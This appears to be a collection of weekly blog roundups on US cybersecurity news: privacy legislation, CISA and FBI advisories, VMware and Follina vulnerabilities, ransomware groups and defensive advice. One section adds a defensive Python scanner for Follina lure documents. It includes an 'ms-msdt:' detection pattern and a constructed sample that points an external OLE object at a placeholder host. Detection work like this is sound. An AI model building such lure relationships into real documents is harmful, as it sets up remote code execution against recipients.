Cybersecurity Saturday

From Capitol Hill, Cyberscoop reports

A sweeping federal privacy bill unveiled Friday [June 3] would give Americans unprecedented control over how companies collect and use their data. 

The discussion draft was released by Sen. Roger Wicker, R-Miss., and Reps. Cathy McMorris Rodgers, R-Wa., and Frank Pallone, D-Mass. It represents the results of months of intense negotiations and is a step toward federal privacy protections long-awaited by civil society groups.

The 64-page privacy framework introduces a range of changes designed to give consumers more control over their data. It would require covered companies to limit data collection, allow consumers to turn off targeted advertisements, grant broad protections for Americans against discriminatory uses of their data and rein in third-party data collection.

The bill also carves out special protections regarding biometric data, a growing source of concern for privacy and human rights activists. Under the legislation, companies can only collect and share biometric data under specific instances including responding to a warrant and affirmative consent.

The FEHBlog notes that Section 208 (data security and protection of covered data) is integrated with the corresponding HIPAA and Gramm-Leach-Bliley rules.

From the law enforcement front

Cybersecurity tells us

The FBI managed to detect and mitigate an attack by Iranian state-sponsored hackers against Boston Children’s Hospital last summer, FBI Director Christopher Wray revealed on Wednesday.

“Quick actions by everyone involved, especially at the hospital, protected both the network and the sick kids that were dependent on it,” Wray said at the Boston Conference on Cyber Security.

Wray called the incident one of the “most despicable cyberattacks” he’s seen, but he noted that the threat was hardly an isolated one. In 2021 the FBI saw ransomware attacks against 14 of the 16 services deemed critical infrastructure by the U.S. government, including hospitals. The FBI issued a warning last November that Iranian hackers were seeking data that could be used to hack U.S. companies.

The agency has been “laser-focused” on potential threats to critical infrastructure resulting from the United States’ support of Ukraine during an ongoing invasion of the nation by Russia. The United States has observed Russia “taking specific preparatory steps towards potential destructive attacks, both here and abroad,” Wray said. And the fallout of those attacks could get worse.

Nextgov informs us

Federal law enforcement agencies have seized several internet domain names in pursuit of an international investigation into websites that permit users to buy stolen personal data and information or hack other networks. 

Announced on Wednesday [June 1], the domain names OVH Booter, WeLeakInfo and IPStress.in have all been procured by the Federal Bureau of Investigation and Department of Justice with a seizure warrant issued by a U.S. District Court for the District of Columbia. 

“Today, the FBI and the department stopped two distressingly common threats: websites trafficking in stolen personal information and sites which attack and disrupt legitimate internet businesses,” said U.S. Attorney Matthew Graves. “Cybercrime often crosses national borders. Using strong working relationships with our international law enforcement partners, we will address crimes like these that threaten privacy, security and commerce around the globe.”

From the vulnerabilities front over the last week

  • CISA has updated Cybersecurity Advisory AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control, originally released May 18, 2022. The advisory has been updated to include additional indicators of compromise and detection signatures, as well as tactics, techniques, and procedures reported by trusted third parties. CISA encourages organizations to review the latest update to AA22-138B and update impacted VMware products to the latest version or remove impacted versions from organizational networks. 
  • Microsoft has released workaround guidance to address a remote code execution (RCE) vulnerability—CVE-2022-30190, known as “Follina”—affecting the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. Microsoft has reported active exploitation of this vulnerability in the wild. CISA urges users and administrators to review Microsoft’s Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability and apply the necessary workaround.  Bleeping Computer offers more details on Follina, and Wired offers an update on this Follina warning.
  • Atlassian has released new Confluence Server and Data Center versions to address remote code execution vulnerability CVE-2022-26134 affecting these products. An unauthenticated, remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability. CISA strongly urges organizations to review Confluence Security Advisory 2022-06-02 and upgrade Confluence Server and Confluence Data Center.
  • The Healthcare Cybersecurity Coordination Center offered a webinar on the Return of Emotet and the Threat to the Health Sector. Emotet has been called the world’s most dangerous malware.
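Microsoft’s guidance linked above covers the endpoint workaround; the other half of the Follina response is triaging documents that already arrived in mailboxes. The scanner below is an added example written for this page, not Microsoft’s or CISA’s tooling. It relies on the publicly reported Follina delivery chain, which the bullet above does not spell out: a Word document carrying an external OLE-object relationship that fetches HTML, which in turn invokes the ms-msdt: URI. The package layout it parses (the .rels parts, TargetMode="External", the oleObject relationship type) is standard Office Open XML. The two sample documents are constructed in memory, and example.invalid is a placeholder host.

```python
"""Scan .docx packages for the external OLE-object relationship that Follina
(CVE-2022-30190) lures use. Added illustrative example; not Microsoft's or
CISA's tooling. The .rels layout, TargetMode="External" and the oleObject
relationship type come from the Office Open XML packaging conventions."""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

REL_URI = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
            "relationships/oleObject")
# The ms-msdt: URI is what the fetched HTML hands to MSDT; a copy of it inside
# the document package itself (some variants embed it directly) is never benign.
MSDT_URI = re.compile(rb"ms-msdt:", re.IGNORECASE)


def scan_docx(data: bytes) -> list:
    """Return findings (strings) for one .docx given as bytes; [] means clean."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            blob = pkg.read(name)
            if MSDT_URI.search(blob):
                hits.append(f"{name}: contains ms-msdt: URI")
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(blob)
            except ET.ParseError:
                hits.append(f"{name}: malformed relationships part")
                continue
            for rel in root.iter(f"{{{REL_URI}}}Relationship"):
                external = rel.get("TargetMode") == "External"
                if external and rel.get("Type") == OLE_TYPE:
                    hits.append(f"{name}: external OLE object -> {rel.get('Target')}")
    return hits


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal in-memory .docx (constructed test input, not a real lure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed samples: an ordinary styles relationship, and an external
# oleObject relationship pointing at a hypothetical host (example.invalid).
BENIGN_RELS = (
    f'<Relationships xmlns="{REL_URI}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
    'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    '</Relationships>'
)
LURE_RELS = (
    f'<Relationships xmlns="{REL_URI}">'
    f'<Relationship Id="rId1" Type="{OLE_TYPE}" '
    'Target="http://example.invalid/stage.html!" TargetMode="External"/>'
    '</Relationships>'
)

if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:  # no files given: run against the constructed samples
        for label, rels in (("benign", BENIGN_RELS), ("lure", LURE_RELS)):
            print(label, scan_docx(build_docx(rels)) or ["clean"])
    for path in paths:
        with open(path, "rb") as fh:
            for hit in scan_docx(fh.read()) or ["clean"]:
                print(f"{path}: {hit}")
```

Run it with one or more .docx paths, or with no arguments to see the two constructed samples scored. An external oleObject relationship is rare in legitimate documents and is the same artifact used by earlier remote-template attacks, so a hit is worth a look even where the HTML stage has already been taken down.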

From the ransomware front over the last week

The Wall Street Journal reports, “Russia-linked ransomware groups are splitting into smaller cells or cycling through different types of malware in attempts to evade a growing array of U.S. sanctions and law-enforcement pressure, cybersecurity experts say.”

CISA issued an alert on the Karakurt Data Extortion Group. “Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.”

Here is a link to Bleeping Computer’s latest Week in Ransomware.

From the cyber defense front

  • Cyberscoop offers a video interview with Jim Richberg, Public Sector Field CISO and VP of Information Security at Fortinet concerning “important strategies to counter today’s heightened threat environment.”
  • ZDNet identifies five simple errors that can make your “cloud” an attractive target for hackers.
  • Security Week discusses four tactics to protect email systems.
  • Health IT Security delves into the topic of HIPAA Physical Safeguards.

Cybersecurity Saturday

From Capitol Hill, Health IT Security reports

The US Senate Committee on Health, Education, Labor, and Pensions (HELP) held a full committee hearing on May 18 to discuss the need for an increased focus on education and healthcare cybersecurity.

“Attacks on healthcare are increasing in volume, variety, and impact—with consequences that now include the loss of life,” Joshua Corman, founder of I Am the Cavalry, said in his testimony.

“While directionally correct steps have been taken, we’re getting worse faster than we’re getting better. Bold actions and assistance will be required to change this trajectory, address these market failures, lack of incentives, and historical under-investments.”

Healthcare Dive adds

* Internal actors continue to pose a sticky cybersecurity problem for healthcare companies despite not causing a majority of data breaches, according to a new data breach report from Verizon.

* Employees were responsible for 39% of healthcare breaches last year. That’s compared to just 18% across all industries, Verizon found.

* The makeup of the insider breach has shifted from generally malicious misuse incidents to miscellaneous errors, with employees being more than 2.5 times more likely to make an error than purposefully misuse their access. Data misdelivery — like sending an email to the wrong person — along with device or document loss are the most common employee errors in healthcare, according to the report.

CISA offers its assistance:

Cyber actors routinely exploit poor security configurations (either misconfigured or left unsecured), weak controls, and other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system. This joint Cybersecurity Advisory identifies commonly exploited controls and practices and includes best practices to mitigate the issues. This advisory was coauthored by the cybersecurity authorities of the United States, Canada, New Zealand, the Netherlands, and the United Kingdom.


Also from the vulnerability front, Cybersecurity Dive reports

Recurring critical vulnerabilities for VMware products this year indicate a worrying trend for customers that suggests the virtualization leader is taking a more reactive approach to security.

The company’s VMware Horizon product got hit hard by the Log4j vulnerability, and earlier this month VMware found itself entangled in an emergency directive from the Cybersecurity and Infrastructure Security Agency (CISA) that impacts up to 10 VMware products. 

It was the 10th emergency directive issued by CISA since the agency was founded in late 2018. 

Virtualization software is ubiquitous and managing the technology is further complicated by its many parts, ExtraHop CISO Jeff Costlow wrote in an email. Threat actors target vulnerabilities across these disaggregated systems before patches are released or deployed by impacted organizations.

VMware’s reputation in this regard has also taken a hit. 

Perhaps that’s what led to this development, which the Wall Street Journal reports:

Broadcom Inc. Chief Executive Hock Tan’s $61 billion deal to buy VMware Inc. marks the biggest bet yet that the boom in enterprise software demand will endure despite the economic tumult—and that bundling disparate offerings of low-profile products can yield outsize returns. 

Mr. Tan built Broadcom into a microchip powerhouse by acquiring makers of a host of unsexy-but-essential components, then cutting costs and leveraging the company’s growing pricing power. He is now banking that the same model will work in corporate software.

The deal to buy VMware, announced Thursday after The Wall Street Journal reported on details of the talks earlier in the week, would push Broadcom deeper into a software world populated by incumbents such as International Business Machines Corp. and Oracle Corp. as well as independent companies that specialize in niche applications. 

CISA added 20 known exploited vulnerabilities to its catalog this past week.

Bleeping Computer’s Week in Ransomware was not published this week. Have a good Memorial Day Weekend.

Cybersecurity Update

From Capitol Hill, Nextgov informs us

Having cleared the Senate in January, the State and Local Government Cybersecurity Act passed the House Tuesday and now awaits President Joe Biden’s signature.

The bill updates the House Homeland Security Act to direct the Department of Homeland Security to improve information sharing and coordination with state, local and tribal governments—all of which face growing risks of cyberattack. The legislation requires federal cybersecurity officials to share cybersecurity threat, vulnerability and breach data with states and localities, and provide some recovery resources when attacks occur.

From the vulnerabilities front —

Federal News Network reports

Agencies have until Monday [May 23] to mitigate vulnerabilities in five products from VMware that permit attackers to have deep access without the need to authenticate.

The Cybersecurity and Infrastructure Security Agency issued a new emergency directive today saying the vulnerabilities in VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager put federal networks and systems at immediate risk.

“These vulnerabilities pose an unacceptable risk to federal network security,” said CISA Director Jen Easterly in a release. “CISA has issued this Emergency Directive to ensure that federal civilian agencies take urgent action to protect their networks. We also strongly urge every organization — large and small — to follow the federal government’s lead and take similar steps to safeguard their networks.”

Here’s a link to the CISA website on this emergency directive.

CISA also released an analysis of Fiscal Year 2021 Risk and Vulnerability Assessments.

[This] analysis and infographic details the findings from the 112 Risk and Vulnerability Assessments (RVAs) conducted across multiple sectors in Fiscal Year 2021 (FY21). 

The analysis details a sample attack path comprising 11 successive tactics, or steps, a cyber threat actor could take to compromise an organization with weaknesses that are representative of those CISA observed in FY21 RVAs. The infographic highlights the three most successful techniques for each tactic that the RVAs documented. Both the analysis and the infographic map threat actor behavior to the MITRE ATT&CK® framework. 

CISA also added two known exploited vulnerabilities to its catalog last week.

From the ransomware front

Cybersecurity Dive reports

Most executives have and are willing to pay ransoms in the event of an attack, despite broad and consistent advice to the contrary. 

Nearly four in five organizations impacted by ransomware attacks have paid the ransom to regain access to corporate data, according to a survey conducted last month by Kaspersky.

The findings, while not surprising, highlight the extent to which a widely acknowledged best practice is rarely followed. Cybersecurity professionals, including Kaspersky, consistently advise businesses hit by ransomware to never pay the ransom.

Cyberscoop tells us

The federal government has made strides in deterring ransomware over the past year, but still has a number of milestones to reach, according to a new paper from the Institute for Security and Technology’s Ransomware Task Force. * * *

Of the 48 specific recommendations the Ransomware Task Force made in its initial report, 12 have seen tangible progress in the year since. Some initial steps have been taken on 29 recommendations, while seven recommendations have seen no action.

The United States has made the most progress in addressing the RTF’s recommendations for deterring ransomware, according to Friday’s update. In addition to the Department of Homeland Security launching a hiring “sprint” to combat cyber crime, the Justice Department last year created its own ransomware task force. And at the event Friday, Cybersecurity and Infrastructure Security Agency Director Jen Easterly said the DHS unit is creating another task force to collaborate with the FBI and other agencies that fight cybercrime.

The Healthcare Cybersecurity Coordination Center released a PowerPoint on major cyber organizations of the Russian Intelligence Services.

Bleeping Computer reports

The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more.

This news comes from Advanced Intel’s Yelisey Boguslavskiy, who tweeted [last Thursday] afternoon that the gang’s internal infrastructure was turned off. * * *

While it may seem strange for Conti to shut down in the middle of their information war with Costa Rica, Boguslavskiy tells us that Conti conducted this very public attack to create a facade of a live operation while the Conti members slowly migrated to other, smaller ransomware operations.

Of course, here is a link to Bleeping Computer’s Week in Ransomware.

From the cyber defenses front

The Wall Street Journal reports

The Justice Department on Thursday [May 19] urged prosecutors to narrow their enforcement of the nation’s main anti-hacking law in a bid to protect legitimate researchers who probe technology for security flaws.

The policy change is a victory for the many cyber professionals and academics who have criticized the Computer Fraud and Abuse Act for potentially criminalizing research that security experts see as key to protecting computer systems from cyberattacks.

Health Data Management discusses seven key steps for avoiding cyberattacks:

1. Protect all workloads
2. Know your adversary
3. Be ready when every second counts
4. Adopt a zero-trust approach
5. Monitor the cybercriminal underground
6. Invest in elite threat hunting
7. Build a cybersecurity culture

CISA offers an updated list of its “free” cybersecurity services, tools, and resources.

Cybersecurity Saturday

From our Nation’s Capital, Cybersecurity Dive reports

On the one-year anniversary of the Executive Order on Improving the Nation’s Cybersecurity, industry experts say the Biden administration has made significant inroads in raising software security standards, but additional work and financial support is necessary to achieve security end goals. 

The Office of Management and Budget’s (OMB) federal zero trust strategy enjoys almost unanimous support from federal cybersecurity decision makers, however two-thirds of federal cybersecurity decision makers said the three-year timeline was unrealistic, according to a study from MeriTalk, sponsored by AWS, CrowdStrike and Zscaler. Just 14% of those surveyed believe the program is properly funded.

Almost two-thirds of federal officials expect to achieve zero trust goals by the goal date of 2024, according to a separate study from General Dynamics Information Technology. However, many of those officials see significant challenges, including a lack of sufficient IT staff and the need to replace legacy infrastructure.

My, how time flies.

Cyberwire adds

A $63 million settlement has been reached in the class-action lawsuit filed over the 2015 data breach of the US Office of Personnel Management (OPM) that exposed the data of over 21 million current, former, and prospective federal employees and family members, the Epoch Times reports. The files were allegedly stolen by China-backed hackers, who exfiltrated highly sensitive information such as fingerprints and psychological and emotional health histories, and it is reported that the Chinese government has been using data from such breaches to build a database on American citizens for political and economic espionage. The agreement explains, “The settlement is the result of extensive negotiations and accounts for the unique aspects of this litigation, including the strict limitation on recovering from the Government and the causation problems that Defendants would have argued result from the hack’s attribution to a foreign state actor…That these data breaches were attributed to the Chinese government, apparently motivated by foreign policy considerations, would have compounded the risks associated with tracing plaintiffs’ harm to [OPM].” Under the settlement, which is still awaiting approval from a federal judge, OPM will pay $60 million and OPM contractor Peraton will pay $3 million into a fund for victims of the hack.

The news strikes the FEHBlog as a good deal for the government.

From the ransomware front, Cyberscoop informs us

AvosLocker, a prolific ransomware group that was the subject of a recent joint FBI and U.S. Treasury Department warning, claimed this week that it had hit a Dallas-based nonprofit Catholic health system with more than 600 facilities across four U.S. states, Mexico, Chile and Colombia.

The attack on CHRISTUS Health marks the second health care system AvosLocker targeted in the last two months. Michigan-based McKenzie Health System began notifying customers this week that patients’ personal data had been stolen from the company’s network in a “security incident” that “disrupted” some of its IT systems in March. The company did not identify the attacker, but AvosLocker posted purported McKenzie data to its dark web leak site April 6. * * *

Security Week adds

Over the past several months, Iran-linked cyberespionage group Charming Kitten has been engaging in financially-motivated activities, the Secureworks Counter Threat Unit (CTU) reports.

Also referred to as APT35, Magic Hound, NewsBeef, Newscaster, Phosphorus, and TA453, the advanced persistent threat (APT) actor is known for the targeting of activists, government organizations, journalists, and various other entities. * * *

The security researchers assess that, while the group has managed to compromise a large number of targets worldwide, “their ability to capitalize on that access for financial gain or intelligence collection appears limited.” However, the use of publicly available tools for ransomware operations shows that the group remains an ongoing threat, Secureworks concludes.

For more on Charming Kitten, check out this Cyberscoop article.

Here is a link to Bleeping Computer’s Week in Ransomware column.

From the cyber vulnerabilities front, CISA added one new known exploited vulnerability to its catalog.

From the cyber defenses front, here’s a link to a press release of note

The Cybersecurity and Infrastructure Security Agency (CISA), in partnership with the United Kingdom’s National Cyber Security Centre (NCSC-UK), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) released an advisory today [May 11] with cybersecurity best practices for information and communications technology (ICT), focusing on enabling transparent discussions between managed service providers (MSPs) and their customers on securing sensitive data. CISA, NCSC-UK, ACSC, CCCS, NZ-NCSC, NSA, and FBI expect state-sponsored advanced persistent threat (APT) groups and other malicious cyber actors to increase their targeting of MSPs against both provider and customer networks. 

Security Week offers an expert view on seven steps to reduce risk to your critical infrastructure quickly.

Cybersecurity Saturday

From the ransomware front

The HHS Cybersecurity Program released a PowerPoint presentation on ransomware trends in the first quarter of this year.

Here’s a link to Bleeping Computer’s The Week in Ransomware.

Ransomware operations continue to evolve, with new groups appearing and others quietly shutting down their operations or rebranding as new groups. * * * [For example,] the notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks.

Bleeping Computer adds

The US Department of State is offering up to $15 million for information that helps identify and locate leadership and co-conspirators of the infamous Conti ransomware gang.

Up to $10 million of this reward is offered for info on Conti leaders’ identity and location, and an additional $5 million for information leading to the arrest and/or conviction of individuals who conspired or attempted to participate in Conti ransomware attacks.

From the vulnerabilities front

  • The HHS Cybersecurity Program issued a bulletin on “April Vulnerabilities of Interest to the Health Sector.”
  • The FBI has warned that business email compromise (BEC) fraud cost businesses around the world $43 billion in losses during the period between June 2016 and December 2021. The FBI’s Internet Crime Complaint Center (IC3) logged a whopping 241,206 complaints in the four-and-a-half-year period, with losses totaling $43 billion, according to a new public service announcement.

From the cyberdefenses front, CISA “is beginning a month-long mission to rock the message that multifactor authentication keeps you more secure! So, join us for MFA May!” Throughout the month of May:

Follow CISA on Twitter, Facebook, LinkedIn, and Instagram for rocking content all month on MFA.

Tell us on social media that your business or personal devices are now protected by MFA with the hashtag #EnableMFA! We’ll do our best to Pour Some Sugar on your posts!

And since we all get by With A Little Help from Our Friends, challenge your friends, family, co-workers, and fellow rockers to #EnableMFA too.

For What it’s Worth, you can always learn more about multi-factor authentication at https://www.cisa.gov/mfa

Cybersecurity Saturday

From the ransomware front, Cybersecurity Dive reports

The prevalence and scope of ransomware exploded in 2021, as two-thirds of mid-sized organizations worldwide were targets and average ransom payouts saw a five-fold increase, according to the State of Ransomware 2022 report from Sophos released Wednesday. 

Ransomware hit 66% of mid-sized organizations last year, up from 37% in 2020. Average ransom payments reached $812,000 during 2021, compared with $170,000 the prior year.  

Among organizations with encrypted data, 46% paid a ransom to adversaries. In addition, 26% of organizations who were able to restore data from backups, still decided to pay a ransom.

To make matters even worse, Security Week informs us

As part of a recent cyberattack, threat actors deployed ransomware less than four hours after compromising the victim’s environment, according to researchers with The DFIR Report.

The attack started with an IcedID payload being deployed on a user endpoint and led to the execution of Quantum ransomware only three hours and 44 minutes later. DFIR Report researchers described it as one of the fastest ransomware attacks they have observed to date.

In a Ryuk ransomware attack in October 2020, the threat actors started encrypting the victim’s data only 29 hours after the initial breach, but the median global dwell time for ransomware is roughly 5 days, according to Mandiant’s M-Trends 2022 report.

Once the ransomware has been executed, however, the victim’s data may be encrypted within minutes. A recent report from Splunk shows that ransomware needs an average of 43 minutes to encrypt data, while the fastest encryption time is less than 6 minutes.

ZDNet describes how a single failure to patch a vulnerability opened the door to ransomware hackers. The article emphasizes the importance of basic cybersecurity hygiene advice:

“The biggest lesson here is patch the network infrastructure – whatever is facing the internet, it’s always important for it to be fully patched,” said Daniel dos Santos, head of security research at Forescout.

It’s also recommended that organisations monitor their networks for external access from known IP addresses or unusual patterns of behavior. In addition, businesses should back up their servers regularly. Then, if something happens, the network can be restored to a recent point without needing to pay a ransom.

Perhaps then it is not surprising that a Security Week expert advises “it is important to increase an organization’s ransomware preparedness and assure that the tools needed for remediation, eradication, and recovery are not just in place but also functioning as expected. This is especially true for the recovery of endpoints, which represent an essential tool for remote workers to conduct their assigned business tasks in today’s work-from-anywhere environment.” 

As always (and it may be every other week now), here is a link to Bleeping Computer’s The Week in Ransomware.

From the vulnerabilities front, HHS Cybersecurity Program released

  • a report on 2021’s top exploited vulnerabilities
  • a warning about BlackCat/ALPHV Ransomware Indicators of Compromise, and
  • an international joint cybersecurity advisory on Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure.

CISA added “seven new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.”

Health IT Security notes

Mandiant Threat Intelligence observed a record number of zero-day exploits in 2021, its latest report revealed. The firm identified 80 exploited zero-days in 2021, compared to just 30 in 2020. Threat actors favored zero-days in Google, Microsoft, and Apple products most frequently, largely exhibiting the popularity of those vendors.

The term “zero-day” indicates that there is no time between when a vulnerability is discovered by developers and when it is exploited by bad actors.

From the cyberdefenses front —

  • Healthcare Dive discusses what cyber insurance companies expect from their policyholders.
  • Federal News Network provides insights into achieving zero trust requirements.
  • ISACA explains what you need to know about malicious cybertrends.

Cybersecurity Saturday

The Wall Street Journal recently interviewed IBM’s CEO Arvind Krishna. The interview concludes as follows:

WSJ: What is the biggest challenge facing the CIO and enterprise technology going forward?

Mr. Krishna: Cybersecurity is the issue of the decade. I think that is the single biggest issue we all are going to face. You have to take an enterprise approach, layered defenses. You have got to encrypt your data. You have got to worry about access control. You have got to believe you will get broken into. You make sure that you can recover really quickly, especially when it comes to critical systems.

Well put.

The Cybersecurity and Infrastructure Security Agency informs us

The Federal Bureau of Investigation (FBI) has released a Flash report detailing indicators of compromise (IOCs) associated with attacks involving BlackCat/ALPHV, a Ransomware-as-a-Service that has compromised at least 60 entities worldwide.

CISA encourages users and administrators to review the IOCs and technical details in FBI Flash CU-000167-MW and apply the recommended mitigations. 

Security Week and Bleeping Computer expand on this FBI alert for those interested.

CISA also added three known exploited vulnerabilities to its catalog.

In other vulnerability news, Cyberscoop tells us

More than 450 security researchers working through the Department of Homeland Security’s “Hack the DHS” bug bounty program identified more than 122 vulnerabilities, 27 of which were deemed critical, according to a DHS statement first obtained by CyberScoop.

The agency awarded $125,600 to participants in the program for finding and identifying the vulnerabilities, the agency said in the statement. The researchers, vetted by the agency before participating, were eligible to receive between $500 and $5,000 for verified vulnerabilities, depending on the severity. * * *

Friday’s results represent the first phase of the DHS bug bounty program. The second phase will consist of a live, in-person hacking event, while the third will identify lessons learned to inform future bug bounty programs.

Cybersecurity Dive reports

Amazon Web Services is scrambling to assist customers after security researchers at Palo Alto Networks found severe vulnerabilities in AWS hotpatches that were supposed to protect customers from the Log4Shell vulnerability. 

AWS released a software tool in mid-December designed to patch vulnerabilities found in the Log4j library, however security researchers at Palo Alto’s Unit 42 discovered code vulnerabilities that could let attackers break out of a container environment and gain escalated privileges. 

After working with Palo Alto researchers for months, Amazon released a new hotpatch earlier this week, Unit 42 said in research released Tuesday. Unit 42 researcher Yuval Avrahami is urging organizations to review their container environments and upgrade to the fixed version. A large number of users may have downloaded the original hotpatches. 

The HHS Health Sector Cybersecurity Coordination Center (HC3) released a comprehensive PowerPoint presentation about insider threats in healthcare.

From the ransomware front, HC3 issued an alert on Hive ransomware.

Hive is an exceptionally aggressive, financially-motivated ransomware group known to maintain sophisticated capabilities who have historically targeted healthcare organizations frequently. HC3 recommends the Healthcare and Public Health (HPH) Sector be aware of their operations and apply appropriate cybersecurity principles and practices found in this document in defending their infrastructure and data against compromise.

Beckers Health IT Issues explains

Here are four things to know about the cyber group, according to the warning: 

1. The group uses many common ransomware tactics, including the exploit of remote desktop protocol or VPN, and phishing attacks, in addition to more aggressive methods like directly calling the victims to apply pressure and negotiate ransom payments.

2. Other tactics deployed by the group include searching the victim’s systems that are tied to backups and either terminating or disrupting those connections, deleting shadow copies, backup files and even system snapshots.

3. Hive also conducts double extortion and supports this with their data leaks site, while operating as a ransomware-as-a-service model.

In total, Hive has claimed attacks on approximately 355 companies within 100 days of operations.

HHS is urging healthcare organizations to increase their preventive security measures, such as two-factor authentication, strong passwords, sufficient backups of the most critical data and continuous monitoring.

Speaking of passwords, Cybersecurity Dive discusses the efforts of the FIDO Alliance to gain industry acceptance of using smartphones as the IT authentication standard while the tech industry presses for new methods.

Cybersecurity Saturday

Cyberscoop reports

A joint federal advisory Wednesday says that foreign government-linked hackers are targeting specific industrial processes with tools meant to breach and disrupt them, with one cybersecurity firm noting that the prospective intruders demonstrate an unprecedented “breadth of knowledge” about industrial control systems.

The alert arrives one day after Ukrainian officials and a cyber firm discussed deflecting another ICS-targeting malware that attempted to shut down power in Ukraine. “ICS” is a term that encompasses a number of systems that are especially common in the energy and manufacturing sectors, including a variety known as supervisory control and data acquisition (SCADA).

Cybersecurity company Dragos, which aided in Wednesday’s alert, said it had named the advanced persistent threat (APT) group behind the tools Chernovite, and named the tools themselves Pipedream. Dragos said one potential use of the tools would be to disable an emergency shutdown system. Mandiant, which also aided in the alert, said the malware posed the greatest risk to Ukraine and other nations responding to the Russian invasion.

It’s helpful to know where the Russians are focusing their cyberattacks. Bleeping Computer’s latest Week in Ransomware adds, “The tables have turned with the NB65 hacking group modifying the leaked Conti ransomware to use in attacks on Russian entities.”

On the other hand, STAT News tells us,

Ransomware is no longer a threat reserved for only the largest health institutions. Small and rural providers are also getting hit with a wave of attacks, in some cases forcing them to resort to pen-and-paper record keeping to continue serving patients. “We were woefully unprepared,” said John Gaede, director of information services at Sky Lakes Medical Center in rural Oregon. The health system was hit with an attack in October 2020, just as it was responding to its first local surge of Covid cases, making a tough situation nearly impossible to manage.

Such attacks not only create logistical challenges, but also cut off access to electronic medical histories needed to safely care for patients. Read the full story from Marion Renault.

This past week, the Cybersecurity and Infrastructure Security Agency added nine new vulnerabilities to its catalog. CISA explains

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. 

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.

From the cybersecurity business front, Cybersecurity Dive informs us,

Kaseya, an IT security and remote monitoring firm, said Monday it will buy Datto for $6.2 billion cash. The deal comes about nine months after Kaseya was hit by a major ransomware and supply chain attack that targeted the company’s small- and medium-size customers. 

The price tag is being funded by an equity consortium, led by Insight Partners, along with significant participation from TPG and Temasek, as well as other firms, including Sixth Street. The agreement represents a 52% premium to Datto’s stock price of $23.37 as of March 16th.

Also on Monday, software investment firm Thoma Bravo announced it struck a $6.9 billion deal for identity management firm SailPoint Technologies Holdings and will take the firm private. SailPoint stockholders will receive $65.25 per share in cash, a 48% premium above the 90-day volume weighted average price. However, the deal has a special “go-shop” provision that allows the board to seek higher bids until May 16th.

From the cyberdefenses front —

  • Federal News Network offers a transcript of an expert conversation about the Administration’s “signature cybersecurity initiative, namely to get every agency to move to zero trust systems architectures.”
  • Cybersecurity Dive stresses the importance of any HIPAA-covered business going well beyond the minimum HIPAA privacy and security rule standards.
  • Security Week reviews necessary cyberdefenses in the healthcare context.
  • Another Security Week article recommends that the good guys think like hackers in order to improve their cyberdefenses.

Cybersecurity Saturday

The HHS Cybersecurity Program was a very active publisher last week. It issued

  • On April 5, HC3 released a list of March vulnerabilities of interest to the healthcare sector;
  • On April 6, HC3 issued a second ICS Medical Advisory – Philips Vue PACS;
  • On April 7, HC3 provided a comprehensive slide deck about “Lapsus$, Okta and the Health Sector,” and
  • On April 8, HC3 issued a sector alert titled “Phishing Campaigns Leveraging Legitimate Email Marketing Platforms.”

Meanwhile, the Cybersecurity and Infrastructure Security Agency released

  • A one-pager on how to report cyber incidents to CISA. This document should help FEHB carriers when they need to report cyber incidents to OPM pursuant to the standard FEHB carrier contract;
  • A “Secure Tomorrow Series Toolkit: Using Strategic Foresight to Prepare for the future.” CISA explains “The Secure Tomorrow Series is a unique platform that brings together SMEs, thought leaders, and others from academia, think tanks, the private sector, and National Labs to think proactively about future risks”, and
  • A list of four known exploited vulnerabilities added to CISA’s vulnerabilities catalog.

CISA also announced that

April is Emergency Communications Month! Throughout the month, we’ll be recognizing the important work of both CISA and the emergency response community. The 911 operating system only begins to scratch the surface of emergency communications. This is a broad, complex, and strategically critical field that includes everything from radio communications systems, broadband and narrowband data systems, to alerts and warning systems, and so much more. It’s only because of this communications backbone that our emergency response community can be operational, collaborative, secure and resilient at the most critical moments.

From the cyberthreats front, ZDnet informs us

